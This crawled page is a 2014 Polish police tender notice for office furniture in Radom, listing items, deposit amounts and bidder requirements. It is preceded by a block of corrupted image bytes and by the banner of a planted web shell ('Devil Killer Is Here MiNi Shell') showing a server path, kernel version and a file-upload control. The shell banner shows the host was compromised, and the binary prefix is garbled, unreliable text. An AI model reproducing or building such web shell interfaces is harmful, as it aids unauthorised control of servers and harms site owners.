JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140519/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140519/168396-N-2014.html

<p class="kh_header"><b>Radom: Dostawa sprzętu kwaterunkowego dla jednostek podległych KWP zs. w Radomiu Nr spr. 49/14</b><br>
<b>Numer ogłoszenia: 168396 - 2014; data zamieszczenia: 19.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji z siedzibą w Radomiu , ul. 11 Listopada 37/59, 26-600 Radom, woj. mazowieckie, tel. 48 3453103, faks 48 3452002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.mazowiecka.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu kwaterunkowego dla jednostek podległych KWP zs. w Radomiu Nr spr. 49/14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup, dostarczenie i montaż sprzętu kwaterunkowego wyszczególnionego  i opisanego w załącznikach od 1 do 24  dla jednostek Policji garnizonu mazowieckiego KPP Gostynin, KMP Płock i KMP Ostrołęka
Szacunkowe ilości zamawianego sprzętu:

ZADANIE 1 - 7 (KPP GOSTYNIN ul. 3-go Maja 17)
1.	KRZESŁO OBROTOWE	55	szt.
2.	KRZESŁO MIĘKKIE	149	szt.
3.	FOTEL OBROTOWY SKÓRA NATURALNA	7	szt.
4.	FOTEL OBROTOWY WZMOCNIONY	2	szt.
5.	KRZESŁO DO POCZEKALNI	6	szt.
6.	SZAFA METALOWA ŚREDNIA+2 SKARBCZYKI	26	szt.
7.	SZAFA METALOWA KLASY A	4	szt.
8.	SZAFA METALOWA KLASY C	1	szt.
9.	SZAFA METALOWA NA BROŃ DŁUGĄ	2	szt.
10.	SZAFA METALOWA NA KRÓTKA BROŃ	1	szt.
11.	SZAFA DREWNIANA AKTOWA	46	szt.
12.	SZAFA DREWNIANA UBRANIOWA	41	szt.
13.	SZAFA DREWNIANA GOSPODARCZA	3	szt.
14.	REGAŁ MEBLOWY	7	szt.
15.	REGAŁ BIBLIOTECZNY	2	szt.
16.	SZAFKA STOJĄCA	34	szt.
17.	SZAFKI KUCHENNE (WERSJA 1)	3	kpl.
18.	SZAFKI KUCHENNE (WERSJA 2)	1	kpl.
19.	KOMODA	1	szt.
20.	SZAFKA NA KLUCZE	5	szt.
21.	APTECZKA	5	szt.
22.	BIURKO KOMPUTEROWE	50	szt.
23.	BIURKO TYPU L  LEWE I PRAWE	11	szt.
24.	STÓŁ KONFERENCYJNY	14	szt.
25.	STANOWISKO KOMPUTEROWE	2	szt.
26.	BIURKO GABINETOWE	1	szt.
27.	STÓŁ KUCHENNY	3	szt.
28.	TABORET KUCHENNY	10	szt.
29.	BARIERA BIUROWA	1	szt.
30.	SZAFA BHP Z ŁAWKĄ	42	szt.
31.	REGAŁ MAGAZYNOWY	44	szt.
32.	WERSALKA	1	szt.
33.	KANAPA	1	szt.

ZADANIE 8 - 16 (KMP PŁOCK ul. Kilińskiego 12)
34.	BIURKO GABINETOWE LEWE	2	szt.
35.	BIURKO GABINETOWE PRAWE	1	szt.
36.	SZAFA DREWNIANA UBRANIOWA	3	szt.
37.	STÓŁ KONFERENCYJNY	4	szt.
38.	STÓŁ OKOLICZNOŚCIOWY	3	szt.
39.	REGAŁ BIBLIOTECZNY	3	szt.
40.	REGAŁ MEBLOWY (WITRYNA)	3	szt.
41.	SZAFA METALOWA ŚREDNIA+2 SKARBCZYKI	6	szt.
42.	SZAFA METALOWA KLASY A	3	szt.
43.	SZAFA METALOWA DUŻA	9	szt.
44.	SZAFA METALOWA DUŻA+SKARBCZYK	4	szt.
45.	SZAFA KARTOTECZNA WERSJA 1	1	szt.
46.	SZAFA KARTOTECZNA WERSJA 2	1	szt.
47.	SZAFA KARTOTECZKA WERSJA 3	2	szt.
48.	SZAFA KARTOTECZNA WERSJA 4	2	szt.
49.	REGAŁ DREWNIANY DO POM. MAGAZYNU WERSJA 1	1	szt.
50.	REGAŁ DREWNIANY DO POM. MAGAZYNU WERSJA 2	1	szt.
51.	SZAFA NA ŚLADY I DOWODY RZECZOWE	1	szt.
52.	SZAFA DREWNIANA DO POMIESZCZEŃ SUSZARNI	2	szt.
53.	BIURKO TYPU L  	1	szt.
54.	BIURKO SEKRETARIAT KOMENDANTA	1	szt.
55.	BIBLIOTECZKA DO SEKRETARIATU	1	szt.
56.	SZAFA DREWNIANA GOSPODARCZA	6	szt.
57.	SZAFA DREWNIANA UBRANIOWA	10	szt.
58.	STÓŁ KUCHENNY	16	szt.
59.	TABORET KUCHENNY	56	szt.
60.	STÓŁ KONFERENCYJNY	10	szt.
61.	STÓŁ WARSZTATOWY CIĘŻKI	2	szt.
62.	STÓŁ SERWISOWY ELEKTRONIKA	2	szt.
63.	STÓŁ OGLĘDZINOWY	1	szt.
64.	KORYTARZOWY ZESTAW KRZESEŁ	2	szt.
65.	FOTEL 	3	szt.
66.	SOFA 3-OSOBOWA	1	szt.
67.	SOFA 2-OSOBOWA	2	szt.
68.	WERSALKA	1	szt.
69.	REGAŁ MAGAZYNOWY	12	szt.
70.	FOTEL	2	szt.
71.	FOTEL OBROTOWY SKÓRA ECO	1	szt.
72.	KANAPA ROZKŁADANA	1	szt.
73.	KRZESŁO MIĘKKIE	14	szt.
74.	SOFA 2-OSOBOWA	2	szt.
75.	TAPCZAN	14	szt.
76.	ŁAWA OKOLICZNOŚCIOWA	3	szt.
77.	STÓŁ OKOLICZNOŚCIOWY	12	szt.
78.	SZAFA DREWNIANA UBRANIOWA	15	szt.
79.	SZAFKA PRZYŁÓŻKOWA	14	szt.

ZADANIE 17 - 20 (KMP OSTROŁĘKA ul. Janusza Korczaka 16)
80.	SZAFA METALOWA KLASY A+SKARBCZYK	10	szt.
81.	SZAFA METALOWA KLASY A+2 SKARBCZYKI	4	szt.
82.	SZAFA METALOWA KLASY A	1	szt.
83.	SZAFA METALOWA KLASY B	1	szt.
84.	SZAFA METALOWA KLASY B+SKARBCZYK	2	szt.
85.	SZAFA METALOWA KLASY C	1	szt.
86.	SZAFA METALOWA KLASY C+SKARBCZYK	1	szt.
87.	SZAFA METALOWA DUŻA+SKARBCZYK	1	szt.
88.	SZAFA METALOWA DUŻA+ 2 SKARBCZYKI	1	szt.
89.	SZAFA METALOWA ŚREDNIA+2 SKARBCZYKI	6	szt.
90.	SZAFA METALOWA MAŁA+SKARBCZYK	6	szt.
91.	SZAFA METALOWA MAŁA  	2	szt.
92.	SZAFA METALOWA NA DŁUGĄ BROŃ	1	szt.
93.	STÓŁ OKOLICZNOŚCIOWY	41	szt.
94.	STÓŁ KONFERENCYJNY	12	szt.
95.	BIURKO TYPU L LEWE I PRAWE	5	szt.
96.	SZAFA Z DRZWIAMI PRZESUWNYMI	1	szt.
97.	BIURKO GABINETOWE	1	szt.
98.	SZAFA AKTOWA SEKRETARIAT	1	szt.
99.	BARIERA BIUROWA - KANCELARIA TAJNA	1	szt.
100.	BARIERA BIUROWA - POCZTA SPECJALNA	1	szt.
101.	REGAŁ BIBLIOTECZNY	2	szt.
102.	ŁAWA OKOLICZNOŚCIOWA	1	szt.
103.	STÓŁ OKOLICZNOŚCIOWY	1	szt.
104.	SZAFKA WISZĄCA	1	szt.
105.	SZAFKA Z PÓŁKAMI	1	szt.
106.	KORYTARZOWY ZESTAW KRZESEŁ	5	szt.
107.	FOTEL	2	szt.
108.	KANAPA	1	szt.
109.	KANAPA - NIEBIESKI POKÓJ	1	szt.
110.	KRZESŁO MIĘKKIE MAŁE - NIEBIESKI POKÓJ	1	szt.
111.	REGAŁY PRZESUWNE ARCHIWALNE	2	kpl.

	ZADANIE 21 - 24	KOZIENICE UL. RADOMSKA 1	OSTRÓW MAZOWIECKA UL. PIŁATA 12	SOKOŁÓW PODLASKI UL. WOLNOŚCI 50	ŻUROMIN UL. WARSZAWSKA 8	LIPSKO UL. SPACEROWA 31A	WĘGRÓW UL. PIŁSUDSKIEGO 6	SIEDLCE UL. STAROWIEJSKA 66	PUŁTUSK UL. RYNEK 23	PRZASNYSZ UL. ŚWIERKOWA 5	WYSZKÓW UL. KOŚCIUSZKI 13	KMP RADOM UL. 11-LISTOPADA 37/59	CIECHANÓW UL. 11-GO PUŁKU UŁANÓW LEGIONOWYCH 25	SOCHACZEW UL. WARSZAWSKA 23	KWP RADOM UL. 11-GO LISTOPADA 37/59	CBŚ RADOM UL. 11-GO LISTOPADA 37/59	
Lp.	ASORTYMENT	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	RAZEM
112.	BIURKO KOMPUTEROWE	 	 	 	 	 	 	 	 	 	 	 	 	1	17	 	18
113.	BIURKO 2-SZAFKOWE	5	 	 	 	 	 	10	 	 	 	 	 	 	1	 	16
114.	BIURKO TYPU L	 	2	 	1	 	 	 	 	 	 	 	 	 	 	 	3
115.	BIURKO GABINETOWE	1	 	 	 	 	 	 	 	 	 	 	 	 	 	 	1
116.	KOMPLET SZAFEK KUCHENNYCH 2 SZAFKI	 	 	1	 	 	 	 	 	 	 	 	 	 	 	 	1
117.	KONTENEREK	 	 	2	 	 	 	 	 	 	 	 	 	 	 	 	2
118.	REGAŁ BIBLIOTECZNY	3	 	1	 	4	 	 	 	 	 	 	 	 	 	 	8
119.	REGAŁ MEBLOWY	 	 	 	 	 	 	 	 	 	 	 	 	 	1	 	1
120.	STÓŁ KONFERENCYJNY	 	 	 	 	 	 	 	 	 	 	3	 	 	3	 	6
121.	STÓŁ KUCHENNY	1	 	 	 	 	 	 	 	 	 	 	 	 	 	 	1
122.	STÓŁ OKOLICZNOŚCIOWY	 	 	 	 	 	 	 	 	 	 	 	 	 	2	 	2
123.	SZAFA AKTOWA	 	 	2	 	 	 	12	 	 	 	 	 	 	9	 	23
124.	SZAFA UBRANIOWA	 	3	3	 	 	 	 	 	 	3	 	 	 	13	 	22
125.	SZAFKA POD ZLEWOZMYWAK	 	 	1	 	 	 	 	 	 	 	 	 	 	 	 	1
126.	SZAFKA STOJĄCA	1	 	 	 	 	 	 	 	 	 	 	 	 	7	 	8
127.	SZAFKA RTV	 	1	 	 	 	 	 	 	 	 	 	 	 	 	 	1
128.	WIESZAK UBRANIOWY ŚCIENNY	1	 	 	 	 	 	 	 	 	 	 	 	 	 	 	1
129.	FOTEL OBROTOWY SKÓRA NATURALNA	 	 	 	 	 	1	 	 	 	 	3	 	 	2	 	6
130.	FOTEL OBROTOWY SKÓRA NAT. WZMOCNIONE	 	 	1	 	 	 	 	 	 	2	 	2	 	2	 	7
131.	KORYTARZOWY ZESTAW KRZESEŁ 3SIEDZ.	1	1	 	 	 	 	 	 	 	 	 	 	 	 	 	2
132.	KRZESŁO MIĘKKIE	2	10	8	 	 	 	 	 	5	 	 	 	 	10	 	35
133.	KRZESŁO OBROTOWE	 	 	3	 	 	 	10	 	5	 	 	 	 	36	 	54
134.	TABORET LABORATORYJNY PUR STANDARD LPUS	 	 	 	 	 	 	 	 	 	 	 	 	 	5	 	5
135.	TABORET	4	 	 	 	 	 	 	 	 	 	 	 	 	 	 	4
136.	SZAFA METALOWA DUŻA + 2 SKARBCZYKI	 	 	 	 	 	 	 	 	 	 	 	 	 	7	 	7
137.	SZAFA BHP Z ŁAWKĄ	 	 	 	 	2	 	 	 	 	 	 	 	2	 	 	4
138.	SZAFA METALOWA KLASY A	 	 	 	 	 	 	 	 	2	 	 	 	 	 	2	4
139.	SZAFA METALOWA KLASY A ZE SKARB. 150x70x50	 	 	 	 	 	 	 	1	 	 	 	 	 	2	 	3
140.	SZAFA METALOWA MAŁA	 	1	 	 	 	 	 	 	 	 	 	 	 	 	 	1
141.	SZAFA KARTOTECZNA	 	 	 	 	 	 	 	 	 	 	 	 	 	3	 	3
142.	SZAFA METALOWA NA BROŃ	 	 	 	 	 	 	 	 	 	 	 	 	 	1	 	1
143.	SZAFKA NA KLUCZE	 	1	1	 	 	 	 	 	 	 	 	 	 	1	 	3
144.	REGAŁ MAGAZYNOWY	 	 	 	 	5	 	 	 	 	 	 	 	 	 	 	5
145.	APTECZKA	 	5	1	 	 	 	 	 	 	 	 	 	 	2	 	8.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.11.20.00-0, 39.11.31.00-8, 39.14.13.00-0, 39.13.00.00-2, 39.14.11.00-3, 39.14.31.10-0, 39.11.31.00-8, 39.11.20.00-0, 39.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości :
Zadanie nr 1 - kwota:     479 zł
Zadanie nr 2 - kwota:     766 zł
Zadanie nr 3 - kwota:     794 zł
Zadanie nr 4 - kwota:     599 zł
Zadanie nr 5 - kwota:     450 zł
Zadanie nr 6 - kwota:     213 zł
Zadanie nr 7 - kwota:       24 zł 
Zadanie nr 8 - kwota:     738 zł
Zadanie nr 9 - kwota:     599 zł
Zadanie nr 10 - kwota:    403 zł
Zadanie nr 11 - kwota:    228 zł
Zadanie nr 12 - kwota:      98 zł
Zadanie nr 13 - kwota:    134 zł
Zadanie nr 14 - kwota:      58 zł
Zadanie nr 15 - kwota:    217 zł
Zadanie nr 16 - kwota:    190 zł
Zadanie nr 17 - kwota:  1259 zł
Zadanie nr 18 - kwota:    391 zł
Zadanie nr 19 - kwota :    94 zł
Zadanie nr 20 - kwota:  1258 zł
Zadanie nr 21 - kwota:    295 zł
Zadanie nr 22 - kwota:    369 zł
Zadanie nr 23 - kwota:    442 zł
Zadanie nr 24 - kwota:    592 zł


Wadium musi być wniesione przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku następujących formach:
- w pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy musi być poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z póżn. zm.).

-Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:

49 1010 1010 0022 1913 9120 0000

Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony             z postępowania, zgodnie z zapisem art. 24 ust 2 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga:
W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich zamawiający może je zatrzymać. Okoliczności te muszą zawierać sytuacje określone:
1) w art. 46 ust. 4a prawa zamówień publicznych, tj. jeżeli wykonawca w odpowiedzi                          na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw,
2) w art. 46 ust. 5 prawa zamówień publicznych, tj.: jeżeli wykonawca, którego oferta
została wybrana: 
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. Poza tym z powyższego dokumentu powinno wynikać jednoznacznie, gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. Wadium w innej formie niż pieniądz należy złożyć w oryginale łącznie z ofertą, może być  w oddzielnej kopercie.

Gwarant nie może uzależniać dokonania zapłaty na rzecz Zamawiającego od spełnienia jakichkolwiek dodatkowych warunków lub też od przedłożenia jakiejkolwiek dokumentacji.

Warunki zwrotu wadium:
1. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4 a.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium
niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
2. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
3. Zamawiający zatrzymuje wadium w okolicznościach i na zasadach o których mowa w art. 46 ustawy- Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. Do oferty należy dołączyć oświadczenie o spełnieniu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. Do oferty należy dołączyć oświadczenie o spełnieniu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. Do oferty należy dołączyć oświadczenie o spełnieniu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. Do oferty należy dołączyć oświadczenie o spełnieniu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. Do oferty należy dołączyć oświadczenie o spełnieniu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, Wykonawca zobowiązany jest udowodnić zmawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dysponowania niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 2.Odnośnie dokumentu z III.4.3.1-jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem przy zachowaniu terminu wystawienia wymaganego dla tego rodzaju dokumentu 3.W przypadku udzielenia pełnomocnictwa - oryginał pełnomocnictwa lub kopia poświadczona przez notariusza. 4.formularz ofertowy Wykonawcy . 5. wypełniony we wszystkich pozycjach wykaz asortymentowo-ilościowy (załączniki od 1 do 24- w zależności od składanej oferty częściowej)  - stanowiący integralną część formularza ofertowego. 6.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ( w tym także w przypadku spółki cywilnej) wymagane jest określenie pełnomocnika do ich reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Oryginał pełnomocnictwa lub kopia poświadczona przez notariusza, z którego powinien wynikać zakres umocowania dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy załączyć do oferty.
7. Dowód wpłaty wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

